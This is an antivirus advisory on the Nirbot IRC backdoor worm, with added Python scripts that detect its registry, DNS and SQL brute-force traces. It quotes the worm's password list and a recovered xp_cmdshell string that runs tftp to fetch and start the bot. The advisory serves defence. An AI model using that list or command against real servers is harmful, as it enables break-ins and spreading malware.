W32/Nirbot.worm.gen

Type: Internet Worm
SubType: Internet Relay Chat
Discovery Date: 03/09/2007
Length: various
Minimum DAT: 4981 (03/09/2007)
Updated DAT: 5005 (04/10/2007)
Minimum Engine: 5.1.00
Description Added: 04/02/2007
Description Modified: 04/02/2007 10:31 PM (PT)

Risk Assessment
Corporate User: Low-Profiled
Home User: Low-Profiled

Characteristics

W32/Nirbot.worm is an Internet Relay Chat (IRC) controlled backdoor that gives an attacker unauthorized remote access to the compromised computer. The attacker can use the machine to send spam, install adware or launch a DDoS attack against Internet systems. W32/Nirbot is written in C++ and is typically packed with various runtime packers.

Upon execution, it copies itself into the Windows system directory. Different variants use different file names and may use other locations. Observed names include:

  • %Windir%\%SYSDIR%\zlclint.exe
  • %Windir%\%SYSDIR%\mbp.exe
  • %Windir%\%SYSDIR%\vxaudio.exe
  • %Windir%\%SYSDIR%\rinvs.exe
  • %Windir%\%SYSDIR%\dllhst.exe

and others

It adds the following value to the registry so that it is started every time Windows starts:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
"DllHost" = "%Windir%\%SYSDIR%\dllhst.exe"

The value name and the registry key used vary between variants.
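The Run-key persistence described above is simple to check for on a suspect host. The following Python is an added example, not code from the AVERT description: it parses a constructed `reg export` of the HKLM Run key (the sample text is made up for illustration; the `%SYSDIR%` placeholder used on this page is C:\WINDOWS\system32 on a default install) and flags any entry whose executable name is on the list of file names given above. It extracts the image path from both quoted and unquoted command lines, since Run values may carry arguments.

```python
import ntpath
import re
from typing import List, Tuple

# Executable names the description lists for this family; variants use others too.
NIRBOT_NAMES = {"zlclint.exe", "mbp.exe", "vxaudio.exe", "rinvs.exe", "dllhst.exe"}

# Constructed sample in the format of `reg export HKLM\...\Run` (not taken
# from a real host). Two entries point at watchlisted names, two are benign.
SAMPLE_REG_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"DllHost"="\"C:\\WINDOWS\\system32\\dllhst.exe\""
"SoundMAX"="C:\\WINDOWS\\system32\\vxaudio.exe -quiet"
"ctfmon.exe"="C:\\WINDOWS\\system32\\ctfmon.exe"
"VMware Tools"="\"C:\\Program Files\\VMware\\VMware Tools\\VMwareTray.exe\""
'''

# A .reg value line: "Name"="Data", with \" and \\ as escapes inside the quotes.
_VALUE_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')


def _unescape(s: str) -> str:
    # .reg files escape backslash and double quote with a leading backslash.
    return re.sub(r'\\(.)', r'\1', s)


def image_path(command: str) -> str:
    """Extract the executable path from a Run value's command line."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end > 0 else command[1:]
    # Unquoted command line: take everything up to and including the first ".exe".
    m = re.match(r'(.*?\.exe)', command, re.IGNORECASE)
    return m.group(1) if m else command


def find_suspicious_run_entries(reg_text: str) -> List[Tuple[str, str]]:
    """Return (value name, image path) for Run entries whose executable
    name is on the watchlist, in the order they appear in the export."""
    hits = []
    for line in reg_text.splitlines():
        m = _VALUE_RE.match(line.strip())
        if not m:
            continue  # header, key name, blank line
        name, command = _unescape(m.group(1)), _unescape(m.group(2))
        path = image_path(command)
        # ntpath handles backslash paths regardless of the host OS.
        if ntpath.basename(path).lower() in NIRBOT_NAMES:
            hits.append((name, path))
    return hits


if __name__ == "__main__":
    for name, path in find_suspicious_run_entries(SAMPLE_REG_EXPORT):
        print(f"suspicious Run value {name!r} -> {path}")
```

Because the value name and file name vary between variants, the watchlist is only a starting point; the same parser can be pointed at any Run entry whose target lives in the system directory but is not a known Windows component.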

Some variants have been observed downloading additional trojans, for example from:

http://[omitted].118/MS0ffice.exe 

Most variants check whether a debugger is present on the system and exit if one is found, to hinder analysis of the worm. They also look for and terminate some monitoring tools for the same reason.

The attacker can instruct the bot to perform the following tasks:

  • Gather system information (CPU, RAM, OS version, IP address, user name, uptime).
  • Scan network for machines to infect.
  • Launch a TFTP, HTTP server and SOCKS4 proxy.
  • Download and Execute files.
  • Update bot.
  • Uninstall bot.

Symptoms

Unusual network activity, specifically IRC traffic.

Presence of the above files in the system folders.

Unusual DNS queries. Some variants have been observed sending DNS queries for various non-existent domains to check that the system is talking to a real DNS server; a resolver that answers for everything indicates a simulated analysis environment, in which the bot will not run.
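The NXDOMAIN probing described above is visible on the resolver side. The following Python is an added example, not part of the AVERT description: it runs over constructed resolver log lines (a simplified key=value format made up for this example, not a real capture) and reports any client that receives NXDOMAIN for several distinct names within a short window, while a single mistyped host name from a normal user stays below the threshold.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

# Constructed resolver log (not a real capture). Host 10.1.2.3 fires a burst of
# lookups for names that do not exist; 10.1.2.4 shows ordinary use with one typo.
SAMPLE_DNS_LOG = """\
2007-03-09T10:00:01 client=10.1.2.3 qname=www.update.microsoft.com rcode=NOERROR
2007-03-09T10:00:02 client=10.1.2.3 qname=kqzpd.com rcode=NXDOMAIN
2007-03-09T10:00:02 client=10.1.2.3 qname=wlvrmxc.net rcode=NXDOMAIN
2007-03-09T10:00:03 client=10.1.2.3 qname=pzhtq.org rcode=NXDOMAIN
2007-03-09T10:00:03 client=10.1.2.3 qname=aeigbnd.com rcode=NXDOMAIN
2007-03-09T10:00:04 client=10.1.2.3 qname=xmjqs.net rcode=NXDOMAIN
2007-03-09T10:00:05 client=10.1.2.3 qname=irc.example.net rcode=NOERROR
2007-03-09T10:00:07 client=10.1.2.4 qname=www.example.com rcode=NOERROR
2007-03-09T10:00:09 client=10.1.2.4 qname=wwww.example.com rcode=NXDOMAIN
2007-03-09T10:03:30 client=10.1.2.4 qname=mail.example.com rcode=NOERROR
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) client=(?P<client>\S+) qname=(?P<qname>\S+) rcode=(?P<rcode>\S+)$"
)


def parse(log_text: str):
    """Yield (timestamp, client, qname, rcode) for each well-formed line."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield datetime.fromisoformat(m["ts"]), m["client"], m["qname"].lower(), m["rcode"]


def nxdomain_bursts(log_text: str, window: timedelta = timedelta(seconds=60),
                    threshold: int = 5) -> Dict[str, Tuple[datetime, List[str]]]:
    """Return {client: (burst start, distinct names)} for every client that
    received NXDOMAIN for at least `threshold` distinct names within `window`."""
    recent: Dict[str, deque] = defaultdict(deque)  # client -> (ts, qname) in window
    alerts: Dict[str, Tuple[datetime, List[str]]] = {}
    for ts, client, qname, rcode in parse(log_text):
        if rcode != "NXDOMAIN":
            continue
        q = recent[client]
        q.append((ts, qname))
        while q and ts - q[0][0] > window:  # slide the window forward
            q.popleft()
        names = {n for _, n in q}
        # Distinct names, not raw count: retries of one typo should not trigger.
        if len(names) >= threshold and client not in alerts:
            alerts[client] = (q[0][0], sorted(names))
    return alerts


if __name__ == "__main__":
    for client, (start, names) in nxdomain_bursts(SAMPLE_DNS_LOG).items():
        print(f"{client}: {len(names)} NXDOMAIN names since {start.isoformat()}: {names}")
```

The threshold and window are starting points; on a busy resolver the names should also be checked for the random-looking labels this family uses, since legitimate software (mail servers, some browsers) also generates a steady trickle of NXDOMAIN answers.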

Method of Infection

W32/Nirbot.worm scans the network for vulnerable machines and spreads using the following weaknesses.

  • Weak password exploitation of Microsoft SQL Server.

The bot scans for computers with an exposed port 1433 (the default Microsoft SQL Server port) and attempts to open an SQL connection to it. It tries to log on using combinations drawn from the following list of user names and passwords:

  • administrator  
  • administrador  
  • administrateur 
  • administrat
  • admins 
  • admin  
  • adm
  • password1  
  • password   
  • passwd 
  • pass1234   
  • pass   
  • pwd
  • 007
  • 1  
  • 12 
  • 123
  • 1234   
  • 12345  
  • 123456 
  • 1234567
  • 12345678   
  • 123456789  
  • 1234567890 
  • 2000   
  • 2001   
  • 2002   
  • 2003   
  • 2004   
  • test   
  • guest  
  • none   
  • demo   
  • unix   
  • linux  
  • changeme   
  • default
  • system 
  • server 
  • root   
  • null   
  • qwerty 
  • mail   
  • outlook
  • web
  • www
  • internet   
  • accounts   
  • accounting 
  • home   
  • homeuser   
  • user   
  • oem
  • oemuser
  • oeminstall 
  • windows
  • win98  
  • win2k  
  • winxp  
  • winnt  
  • win2000
  • qaz
  • asd
  • zxc
  • qwe
  • bob
  • jen
  • joe
  • fred   
  • bill   
  • mike   
  • john   
  • peter  
  • luke   
  • sam
  • sue
  • susan  
  • peter  
  • brian  
  • lee
  • neil   
  • ian
  • chris  
  • eric   
  • george 
  • kate   
  • bob
  • katie  
  • mary   
  • login  
  • loginpass  
  • technical  
  • backup 
  • exchange   
  • f[omitted]k   
  • b[omitted]h  
  • s[omitted]t   
  • s[omitted]x
  • god
  • hell   
  • hello  
  • domain 
  • domainpass 
  • domainpassword 
  • database   
  • access 
  • dbpass 
  • dbpassword 
  • databasepass   
  • data   
  • databasepassword   
  • db1
  • db2
  • db1234 
  • sa 
  • sql
  • sqlpassoainstall   
  • orainstall 
  • oracle 
  • ibm
  • cisco  
  • dell   
  • compaq 
  • siemens
  • hp 
  • nokia  
  • xp 
  • control
  • office 
  • blank  
  • winpass
  • main   
  • lan
  • internet   
  • intranet   
  • student
  • teacher
  • staff

If authentication succeeds and the compromised SQL account has sufficient rights (xp_cmdshell requires sysadmin), the bot sends a query over that connection that calls the xp_cmdshell extended stored procedure, which in turn runs tftp.exe on the SQL Server to download and start a copy of the bot. The format string recovered from the bot is shown below; the %s and %d placeholders are filled in at run time with the target server and port, the credentials that worked, and the TFTP source host:

DRIVER={SQL Server};SERVER=%s,%d;UID=%s;PWD=%s;%s EXEC master..xp_cmdshell 'tftp -i %s GET irn.exe&start irn.exe&exit

  • Weak password exploitation of network shares.

The bot also spreads through improperly secured NetBIOS shares. It connects to computers with shared drives and tries the user name and password combinations listed above.
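The SQL Server spread above leaves two traces in the server's own ERRORLOG: a run of failed logons (error 18456) from one client walking the word list, and, on SQL Server 2005 and later where xp_cmdshell is off by default, the configuration change that turns it on (SQL Server 2000 shipped with xp_cmdshell enabled, so that line will not appear there). The following Python is an added example, not part of the AVERT description: it runs over constructed lines written in the style of the ERRORLOG (not from a real server) and reports clients exceeding a failed-logon threshold together with the user names they tried, plus any xp_cmdshell enablement.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

# Constructed lines in the style of the SQL Server ERRORLOG (not a real log):
# 192.168.1.77 walks part of the word list against 'sa' and other names, then a
# session enables xp_cmdshell; 10.0.0.15 is one unrelated mistyped password.
SAMPLE_ERRORLOG = """\
2007-03-09 02:10:15.43 Logon       Login failed for user 'sa'. [CLIENT: 192.168.1.77]
2007-03-09 02:10:15.61 Logon       Login failed for user 'sa'. [CLIENT: 192.168.1.77]
2007-03-09 02:10:15.84 Logon       Login failed for user 'sa'. [CLIENT: 192.168.1.77]
2007-03-09 02:10:16.02 Logon       Login failed for user 'admin'. [CLIENT: 192.168.1.77]
2007-03-09 02:10:16.20 Logon       Login failed for user 'administrator'. [CLIENT: 192.168.1.77]
2007-03-09 02:10:16.41 Logon       Login failed for user 'sql'. [CLIENT: 192.168.1.77]
2007-03-09 02:10:22.10 Logon       Login failed for user 'appuser'. [CLIENT: 10.0.0.15]
2007-03-09 02:10:31.50 spid53      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2007-03-09 02:10:31.88 spid53      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
"""

_TS = r"(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d\.\d\d)"
FAIL_RE = re.compile(_TS + r" Logon\s+Login failed for user '(?P<user>[^']*)'\. \[CLIENT: (?P<client>[^\]]+)\]")
CFG_RE = re.compile(_TS + r" (?P<spid>spid\d+)\s+Configuration option 'xp_cmdshell' changed from 0 to 1")


def _ts(text: str) -> datetime:
    return datetime.strptime(text, "%Y-%m-%d %H:%M:%S.%f")


def analyse(log_text: str, window: timedelta = timedelta(seconds=60), threshold: int = 5):
    """Return (bruteforce, cmdshell):
    bruteforce: {client: (first failure, attempts in window, sorted user names tried)}
    cmdshell:   [(timestamp, spid)] for each time xp_cmdshell was switched on."""
    failures: Dict[str, deque] = defaultdict(deque)  # client -> (ts, user) in window
    bruteforce: Dict[str, Tuple[datetime, int, List[str]]] = {}
    cmdshell: List[Tuple[datetime, str]] = []
    for line in log_text.splitlines():
        m = FAIL_RE.match(line)
        if m:
            ts = _ts(m["ts"])
            q = failures[m["client"]]
            q.append((ts, m["user"]))
            while q and ts - q[0][0] > window:  # keep only the last `window`
                q.popleft()
            if len(q) >= threshold:
                # Several distinct user names from one client is the spray signature.
                bruteforce[m["client"]] = (q[0][0], len(q), sorted({u for _, u in q}))
            continue
        m = CFG_RE.match(line)
        if m:
            cmdshell.append((_ts(m["ts"]), m["spid"]))
    return bruteforce, cmdshell


if __name__ == "__main__":
    bf, cs = analyse(SAMPLE_ERRORLOG)
    for client, (first, n, users) in bf.items():
        print(f"{client}: {n} failed logons since {first.time()} as {users}")
    for ts, spid in cs:
        print(f"xp_cmdshell enabled at {ts.time()} by {spid}")
```

On the hardening side, the same procedure is the thing to disable: `EXEC sp_configure 'xp_cmdshell', 0; RECONFIGURE` switches it off on SQL Server 2005 and later, and the bot's connection string shows why port 1433 should not be reachable from untrusted networks and why 'sa' must not carry a password from the list above.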

 

Removal

A combination of the latest DATs and the Engine will detect and remove this threat. AVERT recommends that users not trust seemingly familiar or safe file icons, particularly for files received via P2P clients, IRC, e-mail or other media where users can share files.

Variants

    N/A

Overview

W32/Nirbot.worm is an Internet Relay Chat (IRC) controlled backdoor that gives an attacker unauthorized remote access to the compromised computer. The attacker can use the machine to send spam, install adware, distribute illegal content or launch a DDoS attack against Internet systems.

This is a generic detection that covers many variants in this family. All of them share the same core characteristics, such as being IRC (Internet Relay Chat) controlled bots, while other characteristics, such as the file name, vary between variants.

Aliases

  • Backdoor.Vanbot.Gen!Pac (VirusBuster)
  • Backdoor.Win32.VanBot.bj (Kaspersky)
  • BDS/VanBot.BJ (Avira)
  • W32.Rinbot!gen (Symantec)
  • W32/Delbot-S (Sophos)
  • W32/Rinbot.H!tr (Fortinet)
  • W32/Rinbot.H.worm (Panda)
